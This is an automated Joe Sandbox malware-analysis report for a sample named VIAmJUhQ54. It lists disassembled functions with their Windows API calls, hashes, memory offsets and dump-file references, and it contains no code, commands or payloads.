                                                                                • Instruction ID: 40ef81e0a56296c8c3bfaea5ecd88e52c9a907ac843e644011192650795e920e
                                                                                • Opcode Fuzzy Hash: 29ca5a0507c082e457417a33f01ea0ca16ab86423bb979dd3242dec60b837270
                                                                                • Instruction Fuzzy Hash: 79320422D29F414DD7239634D822336A29CEFB73D4F15D727E859B5AAAEF2DC8834104
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 674341424-0
                                                                                • Opcode ID: f1409650787cb4756ea2a46a034060cbbf4e9b1bb04b41779d152b07e15c06a5
                                                                                • Instruction ID: 79628722fd52707331b7c4ef7d1fc9d2a92c1bf13dbd76b67a100beaf82d7ab1
                                                                                • Opcode Fuzzy Hash: f1409650787cb4756ea2a46a034060cbbf4e9b1bb04b41779d152b07e15c06a5
                                                                                • Instruction Fuzzy Hash: A322BA71608310DFDB24DF14E884B6FB7E4AF84310F18492DF99A97292DB39E944CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05f2e2cf971d98aea3a7c1df6cdd8f350d68e26129b7f731dcac5804847b5c90
                                                                                • Instruction ID: a2ab56a10b0cafd00afeccea8b602fb6f630fe1b9669c6cac971e599d85dbb45
                                                                                • Opcode Fuzzy Hash: 05f2e2cf971d98aea3a7c1df6cdd8f350d68e26129b7f731dcac5804847b5c90
                                                                                • Instruction Fuzzy Hash: 87B1F220D2AF414DD723A6398871336B65CAFBB3D5F92D71BFC2A74D22EB2585834184
                                                                                APIs
                                                                                • __time64.LIBCMT ref: 0076B6DF
                                                                                  • Part of subcall function 0074344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0076BDC3,00000000,?,?,?,?,0076BF70,00000000,?), ref: 00743453
                                                                                  • Part of subcall function 0074344A: __aulldiv.LIBCMT ref: 00743473
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                • String ID:
                                                                                • API String ID: 2893107130-0
                                                                                • Opcode ID: 9b6d3f4dab0d51318f127f4e41eb5b11fd0140f13283d54c0cb7d9215d7bfa04
                                                                                • Instruction ID: 59eae780d30b61b50f563720ba1682aa4da856b20ff1c17345bd635b5f9cc2b5
                                                                                • Opcode Fuzzy Hash: 9b6d3f4dab0d51318f127f4e41eb5b11fd0140f13283d54c0cb7d9215d7bfa04
                                                                                • Instruction Fuzzy Hash: D1216372635510CBC719CF28C481A92B7E1EB99310B248E6DE4E6CF2C0CB78A945DB54
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 00776ACA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: a3292178968f2cc4e0b3983f8e128a4e84dceac9ed8a17f0c103315db723d1b8
                                                                                • Instruction ID: c9ee02226355af90c92f5dc85d607994d9ae48cdfd9d8ac79433accaf41cc5de
                                                                                • Opcode Fuzzy Hash: a3292178968f2cc4e0b3983f8e128a4e84dceac9ed8a17f0c103315db723d1b8
                                                                                • Instruction Fuzzy Hash: 7CE01235200214AFDB10EB59D404956B7ECAFA4791F05C416E949D7351DAB4E8048BA0
                                                                                APIs
                                                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0076750A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: e784ee3adca986e5d62e457eb8aa9e7528d456759dfb9d71488ad7d62ec1945a
                                                                                • Instruction ID: ecc62b2a6530dd5daece379c5b8d090798b856cff44ab8ca689880ba8f077534
                                                                                • Opcode Fuzzy Hash: e784ee3adca986e5d62e457eb8aa9e7528d456759dfb9d71488ad7d62ec1945a
                                                                                • Instruction Fuzzy Hash: 33D067A416C64569E82D47249C1FFB61908A3417CAFD845897A03990C1BC9C5D11E035
                                                                                APIs
                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0075AD3E), ref: 0075B124
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LogonUser
                                                                                • String ID:
                                                                                • API String ID: 1244722697-0
                                                                                • Opcode ID: 7430348446b099c9bceae715440bbcbe8113cacaf10240d343ca875514b80d09
                                                                                • Instruction ID: 83c50e59a98d832aadc7193cac1bd031a2ee27e5d13ac4d09f22de2506db77b1
                                                                                • Opcode Fuzzy Hash: 7430348446b099c9bceae715440bbcbe8113cacaf10240d343ca875514b80d09
                                                                                • Instruction Fuzzy Hash: 2FD05E321A460EAEDF024FA4DC02EAF3F6AEB04700F408110FA12C50A0C675D931AB50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: 75c81b2960042dc7c12a6a7ba660ab893541b1652d1935e8bce18468dcfc1446
                                                                                • Instruction ID: b0e4a0a4c0c064b7d65467b5629435965fad7c5df0377b51adc675a87d8b8bf8
                                                                                • Opcode Fuzzy Hash: 75c81b2960042dc7c12a6a7ba660ab893541b1652d1935e8bce18468dcfc1446
                                                                                • Instruction Fuzzy Hash: 0EC04CB1401109DFCB51CBC0D9449EFB7BCAB05301F105091A106F1110D7749B859B76
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0074818F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 5840713813c615e6acb844e4c1a8e3273eaac3db32f91127b9f5369514b9a135
                                                                                • Instruction ID: b7d2b2e336223284728eb50c18b12a461602080d989a7373d9ec9253ee43ec08
                                                                                • Opcode Fuzzy Hash: 5840713813c615e6acb844e4c1a8e3273eaac3db32f91127b9f5369514b9a135
                                                                                • Instruction Fuzzy Hash: 43A0113000020CEB8F002B82EC088883F2CEA822A2B008020F80E008208B22A8208A8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b58c87d7778cedd5fc4b544b86bd729b5c5d9ab868ee4a57dd02e495d314b19
                                                                                • Instruction ID: bfc3a6722e1175c2f01476e58abe8021cee832679e33b7a54e61bbdbd65de013
                                                                                • Opcode Fuzzy Hash: 0b58c87d7778cedd5fc4b544b86bd729b5c5d9ab868ee4a57dd02e495d314b19
                                                                                • Instruction Fuzzy Hash: 3A12A070A00219EFDF04DFA5E985AEEB7F5FF48300F148529E506E7291EB39A911CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c63077069a347d160e5410f6ca99bb92531d6db052929816bb3bd4404e5b62fa
                                                                                • Instruction ID: a89e7722053c11007967bb1af0ffba8d51a0806f736f22053db0af9a02ea56b1
                                                                                • Opcode Fuzzy Hash: c63077069a347d160e5410f6ca99bb92531d6db052929816bb3bd4404e5b62fa
                                                                                • Instruction Fuzzy Hash: 00129070904225CFDB24DF58E494ABEB7B1FF18314F148069E98A9B352E739AD81CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3728558374-0
                                                                                • Opcode ID: df06f9d150a85e3ded18761c779c9da00c9459b7681ea51b66571528dbb159b0
                                                                                • Instruction ID: 85799411a0193c93a16d6067899abd0a15363f6206512d8efd4a2aa30ad7f54c
                                                                                • Opcode Fuzzy Hash: df06f9d150a85e3ded18761c779c9da00c9459b7681ea51b66571528dbb159b0
                                                                                • Instruction Fuzzy Hash: 1002A4B0A00119EBDF14EF68E9956AEB7F5FF44300F10C069E806EB256EB39D915CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction ID: d1c50923a0569a5463daead0bf6e79d67757cd6572fea2881f25de2ce339c7e5
                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction Fuzzy Hash: 98C1A5322451A30AEF2D463D847443EFAA15EA27F171A076DD8B3CB5D6EF38C524E660
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction ID: 10a676ec18fd14218c29dee41d470632445fe666088cd0b52dc30485475bebc5
                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction Fuzzy Hash: F0C1C4332051930AEF6D463AC43443EBBA15EA2BB171A076DD4B3CB4D6EF38D524E660
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                • Instruction ID: 453b927d563bcd098dae1473a4761bccd922aeab311be63ad658e0d89b73bdf6
                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                • Instruction Fuzzy Hash: 4FC1B4326451930AEF2D463AC43453EFAA15AA27F1B1A077DD4B3CB5E6FF28C524D620
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction ID: 96a5f757e01cfc89fd40bcba95497a882500c03bb4a649245df84816d1859391
                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction Fuzzy Hash: F3C1913264909309EF2D463AC47443EFAA15AA2BF1B1A177DD4B2CB5D7EF28C524D620
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0078D2DB
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0078D30C
                                                                                • GetSysColor.USER32(0000000F), ref: 0078D318
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0078D332
                                                                                • SelectObject.GDI32(?,00000000), ref: 0078D341
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0078D36C
                                                                                • GetSysColor.USER32(00000010), ref: 0078D374
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0078D37B
                                                                                • FrameRect.USER32(?,?,00000000), ref: 0078D38A
                                                                                • DeleteObject.GDI32(00000000), ref: 0078D391
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0078D3DC
                                                                                • FillRect.USER32(?,?,00000000), ref: 0078D40E
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0078D439
                                                                                  • Part of subcall function 0078D575: GetSysColor.USER32(00000012), ref: 0078D5AE
                                                                                  • Part of subcall function 0078D575: SetTextColor.GDI32(?,?), ref: 0078D5B2
                                                                                  • Part of subcall function 0078D575: GetSysColorBrush.USER32(0000000F), ref: 0078D5C8
                                                                                  • Part of subcall function 0078D575: GetSysColor.USER32(0000000F), ref: 0078D5D3
                                                                                  • Part of subcall function 0078D575: GetSysColor.USER32(00000011), ref: 0078D5F0
                                                                                  • Part of subcall function 0078D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0078D5FE
                                                                                  • Part of subcall function 0078D575: SelectObject.GDI32(?,00000000), ref: 0078D60F
                                                                                  • Part of subcall function 0078D575: SetBkColor.GDI32(?,00000000), ref: 0078D618
                                                                                  • Part of subcall function 0078D575: SelectObject.GDI32(?,?), ref: 0078D625
                                                                                  • Part of subcall function 0078D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0078D644
                                                                                  • Part of subcall function 0078D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0078D65B
                                                                                  • Part of subcall function 0078D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0078D670
                                                                                  • Part of subcall function 0078D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0078D698
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: 1dc69f9117c7b2fbb167a4bbc867121185be336ae9156eb825f6baae5deb23cb
                                                                                • Instruction ID: 43db3081017dbf93238c620749dcf5c2965e80947d8314f04cc1a62ee4169fa6
                                                                                • Opcode Fuzzy Hash: 1dc69f9117c7b2fbb167a4bbc867121185be336ae9156eb825f6baae5deb23cb
                                                                                • Instruction Fuzzy Hash: 04919E71408305FFCB20AF64DC08E6BBBA9FB8A321F104A19F962965E0D779DD44CB56
                                                                                APIs
                                                                                • DestroyWindow.USER32 ref: 0073B98B
                                                                                • DeleteObject.GDI32(00000000), ref: 0073B9CD
                                                                                • DeleteObject.GDI32(00000000), ref: 0073B9D8
                                                                                • DestroyIcon.USER32(00000000), ref: 0073B9E3
                                                                                • DestroyWindow.USER32(00000000), ref: 0073B9EE
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0079D2AA
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0079D2E3
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0079D711
                                                                                  • Part of subcall function 0073B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0073B759,?,00000000,?,?,?,?,0073B72B,00000000,?), ref: 0073BA58
                                                                                • SendMessageW.USER32 ref: 0079D758
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0079D76F
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0079D785
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0079D790
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 464785882-4108050209
                                                                                • Opcode ID: 0c96f74b5d2ee3f013a577b2cd8824972f3a0687aecdc82f398e8bcd04d5a62e
                                                                                • Instruction ID: e4cb3138455ccde9c3374f00dd6695edce9effbfcac309e4ecb9d05701bb2fc9
                                                                                • Opcode Fuzzy Hash: 0c96f74b5d2ee3f013a577b2cd8824972f3a0687aecdc82f398e8bcd04d5a62e
                                                                                • Instruction Fuzzy Hash: 33129D70604201DFDF25CF28D888BA9BBE5FF49304F144569EA8ACB662C739EC51CB91
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0076DBD6
                                                                                • GetDriveTypeW.KERNEL32(?,007BDC54,?,\\.\,007BDC00), ref: 0076DCC3
                                                                                • SetErrorMode.KERNEL32(00000000,007BDC54,?,\\.\,007BDC00), ref: 0076DE29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
